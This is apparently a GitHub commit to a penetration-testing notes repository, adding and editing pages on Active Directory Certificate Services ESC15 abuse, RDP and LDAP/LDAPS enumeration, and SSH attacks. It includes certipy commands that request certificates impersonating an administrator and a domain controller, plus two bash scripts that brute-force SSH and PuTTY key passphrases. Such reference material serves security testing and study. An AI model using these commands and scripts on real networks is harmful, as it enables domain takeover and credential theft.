Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
@snovvcrash
snovvcrash committed Oct 30, 2024
1 parent 1298391 commit d62fadc
Show file tree
Hide file tree
Showing 6 changed files with 82 additions and 7 deletions.
1 change: 1 addition & 0 deletions SUMMARY.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,7 @@
- [ESC1](pentest/infrastructure/ad/ad-cs-abuse/esc1.md)
- [ESC4](pentest/infrastructure/ad/ad-cs-abuse/esc4.md)
- [ESC8](pentest/infrastructure/ad/ad-cs-abuse/esc8.md)
- [ESC15](pentest/infrastructure/ad/ad-cs-abuse/esc15.md)
- [Golden Certificate](pentest/infrastructure/ad/ad-cs-abuse/golden-certificate.md)
* [ADIDNS Abuse](pentest/infrastructure/ad/adidns-abuse.md)
* [Attack Trusts](pentest/infrastructure/ad/attack-trusts.md)
Expand Down
8 changes: 4 additions & 4 deletions pentest/infrastructure/ad/ad-cs-abuse/esc15.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,13 +13,13 @@ description: Inject Application Policies into Version 1 Certificate Templates

Get enabled templates:

```
```powershell
PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates
```

Get v1 templates with `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` that are enabled:

```
```powershell
PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name}
```

Expand All @@ -34,7 +34,7 @@ PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase

Abusing **Client Authentication**:

```
```bash
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn '[email protected]' -sid <DC01_SID> -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```

Expand All @@ -44,7 +44,7 @@ $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpC

Abusing **Certificate Request Agent**:

```
```bash
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```
6 changes: 6 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/rdp.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,12 @@ description: Remote Desktop Protocol
* [https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop](https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop)
* [https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3)

Look for terminal servers in a domain:

```powershell
PS > Get-ADComputer -LDAPFilter "(&(objectClass=computer)(memberOf=CN=Terminal Server License Servers,CN=Builtin,$((Get-ADRootDSE).rootDomainNamingContext)))" | select dNSHostName
```




Expand Down
12 changes: 9 additions & 3 deletions pentest/infrastructure/ad/ldap-ldaps.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,12 @@ description: Lightweight Directory Access Protocol

![LDAP Authentication Protocols (Almond)](/.gitbook/assets/012.png)

Check if LDAPS was ever correctly configured:

```
$ openssl s_client -host 192.168.1.11 -port 636
```




Expand Down Expand Up @@ -91,7 +97,7 @@ Function DecodeUserAccountControl ([int]$UAC)

- [https://github.com/zyn3rgy/LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan)

Scan for LDAP Singing and LDAP Channel Binding:
Scan for LDAP Singing and LDAPS Channel Binding:

```
$ python3 LdapRelayScan.py -method BOTH -dc-ip 192.168.1.11 -u snovvcrash -p 'Passw0rd!'
Expand All @@ -101,7 +107,7 @@ $ for dc in `cat discover/hosts/dc_ip.txt`; do cme ldap $dc -u snovvcrash -p 'Pa



### LDAP Signing & LDAP Channel Binding
### LDAP Signing & LDAPS Channel Binding

- [https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html)

Expand All @@ -116,7 +122,7 @@ If `LdapServerIntegrity` is set to `2`, LDAP Signing is required:
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapServerIntegrity
```

If `LdapEnforceChannelBinding` is set to `2`, LDAP Channel Binding is **always** required:
If `LdapEnforceChannelBinding` is set to `2`, LDAPS Channel Binding is **always** required:

```
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapEnforceChannelBinding
Expand Down
61 changes: 61 additions & 0 deletions pentest/perimeter/ssh.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,67 @@ $ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'ro



## Quicky Offline Private Key Crack

- [https://security.stackexchange.com/a/191122](https://security.stackexchange.com/a/191122)

{% tabs %}
{% tab title="PEM/OpenSSH" %}
{% code title="pem-crack.sh" %}
```bash
#!/usr/bin/env bash

echo "Wordlist : $1"
echo "PEM key : $2"
echo "New PEM key : $3"
cp "$2" "$3" && chmod 600 "$3"

while read -r line
do
err=$( (ssh-keygen -p -P "$line" -N '' -f "$3") 2>&1 )

if [[ ! $err = *"incorrect passphrase"* ]]; then
echo "Passphrase : $line"
echo "$err"
break
fi
done < "$1"
```
{% endcode %}
{% endtab %}
{% tab title="PuTTY PPK" %}
{% code title="ppk-crack.sh" %}
```bash
#!/usr/bin/env bash
# sudo apt install putty-tools -y

echo "Wordlist : $1"
echo "PEM key : $2"
echo "New PEM key : $3"

touch /tmp/empty
while read -r line
do
echo "$line" > /tmp/w
err=$( (puttygen "$2" -P -o "$3" --old-passphrase /tmp/w --new-passphrase /tmp/empty) 2>&1 )

if [[ ! $err = *"wrong passphrase"* ]]; then
echo "Passphrase : $line"
echo "$err"
puttygen "$3" -O private-openssh -o "$3"
break
fi
done < $1

rm -f /tmp/w /tmp/empty
```
{% endcode %}
{% endtab %}
{% endtabs %}




## Enum Users

**CVE-2018-15473**
Expand Down
1 change: 1 addition & 0 deletions redteam/maldev/winapi.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,3 +13,4 @@
## Tools

- [https://github.com/MalwareApiLib/MalwareApiLibrary](https://github.com/MalwareApiLib/MalwareApiLibrary)
- [https://www.leeholmes.com/managing-ini-files-with-powershell/](https://www.leeholmes.com/managing-ini-files-with-powershell/)

0 comments on commit d62fadc

Please sign in to comment.